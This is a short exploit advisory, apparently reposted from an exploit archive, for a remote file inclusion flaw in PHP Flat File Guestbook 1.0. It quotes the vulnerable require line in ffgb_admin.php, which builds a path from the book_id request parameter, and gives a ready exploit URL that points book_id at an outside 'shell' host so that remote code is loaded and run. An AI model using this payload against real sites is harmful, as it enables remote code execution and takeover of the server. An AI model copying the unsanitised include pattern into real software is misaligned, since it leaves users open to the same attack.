Exploit for php platform in category web applications
# Exploit Title: Rfi PHP Flat File Guestbook
# Date: 11-08-2011
# Author: RiRes Walid
# Vendor or Software Link: http://www.advancebydesign.com
# Version: 1.0
# Google dork:
# Tested on: Xp sp2
------------------------------------------------------------
Remote File Inclusion
in ffgb_admin.php
line : 339
require('ffgb_comments/ffgb_'.$_GET['book_id'].'.php');
[o] Exploit
http://localhost/[path]/ffgb_admin.php?book_id=http://shell?
-------------------------------------------------------------
# 0day.today [2018-04-12] #